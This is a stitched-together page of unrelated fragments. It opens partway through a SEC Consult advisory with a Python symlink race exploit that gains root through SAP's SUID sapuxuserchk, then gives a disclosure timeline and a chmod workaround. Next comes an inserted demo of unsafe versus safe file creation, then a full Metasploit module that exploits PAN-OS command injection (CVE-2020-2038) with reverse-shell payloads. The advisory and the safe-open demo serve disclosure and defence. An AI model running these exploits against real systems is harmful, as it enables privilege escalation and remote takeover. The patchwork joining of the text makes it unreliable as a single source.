/>f0.close()<br /><br />pid = os.fork()<br />if pid == 0:<br />    j = 0<br />    while True:<br />        if j > g:<br />            print('done')<br />            os._exit(os.EX_OK)<br />        j += 1<br />        os.system("/usr/sap/SEC/D00/exe/sapuxuserchk < {0} > /dev/null".format(msg_file))<br />else:<br />    i = 0<br />    uid = os.getuid()<br />    success = False<br />    while not success:<br />        if i > g:<br />            print("[-] give up, link too many tries: " + str(i))<br />            break<br />        i += 1<br />        try:<br />            os.unlink(logon_symlink)<br />            os.symlink(target_file, logon_symlink)<br />            statinfo = os.stat(target_file)<br />            if statinfo.st_uid == uid:<br />                os.kill(pid, signal.SIGILL)<br />                print("this many tries: " + str(i))<br />                print("[+] now login as sapmatt ")<br />                f = open(target_file, "w")<br />                f.write(u1_passwd)<br />                f.close()<br />                success = True<br />        except Exception as err:<br />            print('[-] lost the race {0}'.format(err))<br />    os.waitpid(pid, 0)<br />    os.unlink(msg_file)<br /><br />-------------------------------------------------------------------------<br /><br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version of the binary was found to be vulnerable during our tests:<br />* Version: 753, patch 400, changelist 1906766<br /><br />According to the vendor the following products are affected by the discovered<br />vulnerability:<br /><br />SAP NetWeaver AS ABAP, AS Java, ABAP Platform and HANA Database, Versions:<br />* KERNEL 7.22, 7.49, 7.53, 7.77, 7.81, 7.85, 7.86, 7.87, 7.88<br />* KRNL64NUC 7.22, 7.22EXT, 7.49<br />* KRNL64UC 7.22, 7.22EXT, 7.49, 7.53<br />* SAPHOSTAGENT 7.2<br /><br />Please refer to the vendor patch day post:<br />https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-02-25: Contacting vendor through vulnerability submission web form.<br />2022-03-04: Vendor confirms receipt and assigns SAP security incident number<br /> #2270008914.<br />2022-04-29: Requesting status update.<br />2022-05-05: Vendor confirms vulnerability and states it might be addressed<br /> in May 2022 patch day.<br />2022-06-14: Vendor releases patches with SAP security note 3158619.<br />2022-06-15: Requesting the confirmation of the security note on the issue.<br />2022-08-11: Vendor sends the link to the Acknowledgements to Security<br /> Researchers.<br />2022-09-02: Requesting the confirmation of the fix.<br />2022-09-03: Vendor confirms the issue has been fixed on June Patch Day.<br />2022-09-15: Public release of security advisory.<br /><br 
/><br />Solution:<br />---------<br />The following security note needs to be implemented:<br />https://launchpad.support.sap.com/#/notes/3158619<br /><br /><br />Workaround:<br />-----------<br />You can remove the SUID bit from sapuxuserchk as a temporary mitigation.<br /><br /># chmod 0755 sapuxuserchk<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF M. Li / @2022<br /><br /></code></pre>
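The fix for the stat/open window described in the advisory above is to make the existence check and the creation one system call. The following added example, not SAP's code, reproduces the vulnerable sequence in a temp directory with a hook standing in for the attacker winning the race, beside a version that opens with O_CREAT|O_EXCL|O_NOFOLLOW and verifies the opened descriptor with fstat; the fchown step is omitted because the demo runs unprivileged, and all names are assumptions.

```python
import errno
import os
import stat
import tempfile


def create_ticket_unsafe(path, data, between=lambda: None):
    """The stat-then-open sequence from the strace excerpt above.

    `between` stands in for the attacker winning the race: it runs after the existence
    check and before open(). Whatever `path` names at open() time is what gets truncated.
    """
    if os.path.exists(path):          # stat() -> ENOENT, so we proceed
        raise FileExistsError(path)
    between()                         # the window between stat() and open()
    fd = os.open(path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600)  # follows a symlink
    try:
        os.write(fd, data)            # the real program also fchown()s the descriptor here
    finally:
        os.close(fd)


def create_ticket_safe(path, data):
    """One atomic open(): O_EXCL fails with EEXIST if anything, a symlink included, already
    sits at `path`; O_NOFOLLOW additionally refuses to traverse a link at the last component."""
    fd = os.open(path, os.O_RDWR | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW, 0o600)
    try:
        st = os.fstat(fd)             # inspect the object actually opened, not the name
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError("unexpected object at ticket path")
        os.write(fd, data)
    finally:
        os.close(fd)


def demo():
    """Constructed scenario: a link named logon1 pointing at a file that stands in for
    /etc/passwd. Returns what each variant did to that target."""
    ticket = b"constructed ticket contents\n"
    with tempfile.TemporaryDirectory() as work:
        target = os.path.join(work, "victim_file")
        link = os.path.join(work, "logon1")
        with open(target, "wb") as f:
            f.write(b"original\n")

        # Unsafe: the link appears inside the stat/open window -> target truncated and overwritten.
        create_ticket_unsafe(link, ticket, between=lambda: os.symlink(target, link))
        with open(target, "rb") as f:
            unsafe_overwrote = f.read() == ticket

        # Safe: the same planted link is present; the single open() refuses it.
        with open(target, "wb") as f:
            f.write(b"original\n")
        try:
            create_ticket_safe(link, ticket)
            safe_error = None
        except OSError as e:
            safe_error = errno.errorcode[e.errno]
        with open(target, "rb") as f:
            target_intact = f.read() == b"original\n"

        # The safe variant still works on a genuinely fresh path, with owner-only permissions.
        fresh = os.path.join(work, "logon2")
        create_ticket_safe(fresh, ticket)
        fresh_mode = stat.S_IMODE(os.stat(fresh).st_mode)

    return {
        "unsafe_overwrote_target": unsafe_overwrote,
        "safe_error": safe_error,
        "target_intact_after_safe": target_intact,
        "fresh_ticket_mode": fresh_mode,
    }
```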
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br />  Rank = ExcellentRanking<br /><br />  include Msf::Exploit::Remote::HttpClient<br />  include Msf::Exploit::CmdStager<br />  prepend Msf::Exploit::Remote::AutoCheck<br /><br />  require 'ipaddr'<br /><br />  class InvalidRequest < StandardError<br />  end<br /><br />  class InvalidResponse < StandardError<br />  end<br /><br />  def initialize(info = {})<br />    super(<br />      update_info(<br />        info,<br />        'Name' => 'Palo Alto Networks Authenticated Remote Code Execution',<br />        'Description' => %q{<br />          An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated<br />          administrators to execute arbitrary OS commands with root privileges.<br />          This issue impacts PAN-OS versions < 10.0.1, < 9.1.4 and < 9.0.10<br />        },<br />        'Author' => [<br />          'Mikhail Klyuchnikov', # Vulnerability discovery<br />          'Nikita Abramov', # Vulnerability discovery<br />          'UnD3sc0n0c1d0', # Exploit<br />          'jheysel-r7' # msf module<br />        ],<br />        'References' => [<br />          ['CVE', '2020-2038'],<br />          ['URL', 'https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/'],<br />          ['URL', 'https://security.paloaltonetworks.com/CVE-2020-2038'],<br />          ['URL', 'https://github.com/und3sc0n0c1d0/CVE-2020-2038'] # Exploit<br />        ],<br />        'DisclosureDate' => '2020-09-09',<br />        'License' => MSF_LICENSE,<br />        'Platform' => 'linux',<br />        'Privileged' => true,<br />        'Targets' => [<br />          [<br />            'Linux ',<br />            {<br />              'Platform' => 'linux',<br />              'Arch' => [ARCH_X86, ARCH_X64],<br />              'CmdStagerFlavor' => %i[echo printf],<br />              'Type' => :linux_dropper,<br />              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }<br />            }<br />          ],<br />          [<br />            'Unix In-Memory',<br />            {<br />              'Platform' => 'unix',<br />              'Arch' => ARCH_CMD,<br />              'Type' => :unix_memory,<br />              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }<br />            }<br />          ]<br />        ],<br />        'DefaultTarget' => 0,<br />        'DefaultOptions' => {<br />          'RPORT' => 443,<br />          'SSL' => true<br />        },<br />        'Notes' => {<br />          'Stability' => [ CRASH_SAFE ],<br />          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],<br />          'Reliability' => [ REPEATABLE_SESSION ]<br />        }<br />      )<br />    )<br /><br />    register_options(<br />      [<br />        OptString.new('USERNAME', [false, 'PAN-OS administrator username', 'admin']),<br />        OptString.new('PASSWORD', [false, 'Password for username', 'admin'])<br />      ]<br />    )<br />  end<br /><br />  def check<br />    print_status('Authenticating...')<br />    begin<br />      @api_key = api_key<br />    rescue InvalidRequest, InvalidResponse => e<br />      return Exploit::CheckCode::Safe("Error retrieving API key: #{e.class}, #{e}")<br />    end<br />    res = send_request_cgi({<br />      'method' => 'GET',<br />      'keep_cookies' => 'true',<br />      'uri' => normalize_uri(target_uri.path, 'api/'),<br />      'vars_get' => {<br />        'type' => 'version',<br />        'key' => @api_key<br />      }<br />    })<br /><br />    return CheckCode::Unknown('The API did not respond to the request for the version of PAN_OS') unless res&.body<br /><br />    version = Rex::Version.new(res.get_xml_document.xpath('/response/result/sw-version').text)<br /><br />    if version >= Rex::Version.new('9.0.0') && version < Rex::Version.new('9.0.10') ||<br />       version >= Rex::Version.new('9.1.0') && version < Rex::Version.new('9.1.4') ||<br />       version >= Rex::Version.new('10.0.0') && version < Rex::Version.new('10.0.1')<br />      return Exploit::CheckCode::Appears<br />    end<br /><br />    Exploit::CheckCode::Safe<br />  end<br /><br />  def api_key<br />    res = send_request_cgi({<br />      'method' => 'GET',<br />      'uri' => normalize_uri(target_uri.path, 'api/'),<br />      'vars_get' => {<br />        'type' => 'keygen',<br />        'user' => datastore['USERNAME'],<br />        'password' => datastore['PASSWORD']<br />      }<br />    })<br /><br />    if res.nil?<br />      raise InvalidRequest, 'Unreachable'<br />    end<br /><br />    if res.code == 401<br />      raise InvalidRequest, 'Server returned HTTP status 401 - Authentication failed'<br />    end<br /><br />    if res.code == 403<br />      raise InvalidRequest, 'Server returned HTTP status 403 - Authentication failed with "Invalid Credentials"'<br />    end<br /><br />    if res.body.blank?<br />      raise InvalidResponse, 'Empty reply from server'<br />    end<br /><br />    key = res.get_xml_document.xpath('/response/result/key')&.text<br /><br />    if key.nil?<br />      raise InvalidResponse, 'Empty reply from server'<br />    end<br /><br />    print_good('Successfully obtained api key')<br /><br />    key<br />  end<br /><br />  def execute_command(cmd, _opts = {})<br />    payload = "<cms-ping><host>#{IPAddr.new(rand(2**32), Socket::AF_INET)}</host><count>#{rand(1..50)}</count><pattern>111<![CDATA[||#{cmd}||]]></pattern></cms-ping>"<br />    send_request_cgi({<br />      'method' => 'GET',<br />      'uri' => normalize_uri(target_uri.path, 'api/'),<br />      'vars_get' => {<br />        'cmd' => payload,<br />        'type' => 'op',<br />        'key' => @api_key<br />      }<br />    })<br />  end<br /><br />  def exploit<br />    begin<br />      @api_key ||= api_key<br />    rescue InvalidRequest, InvalidResponse => e<br />      fail_with(Failure::UnexpectedReply, "Error retrieving API key: #{e}")<br />    end<br />    print_status('Exploiting...')<br />    case target['Type']<br />    when :unix_memory<br />      execute_command(payload.encoded)<br />    when :linux_dropper<br />      execute_cmdstager<br />    end<br />  end<br /><br />end<br /></code></pre>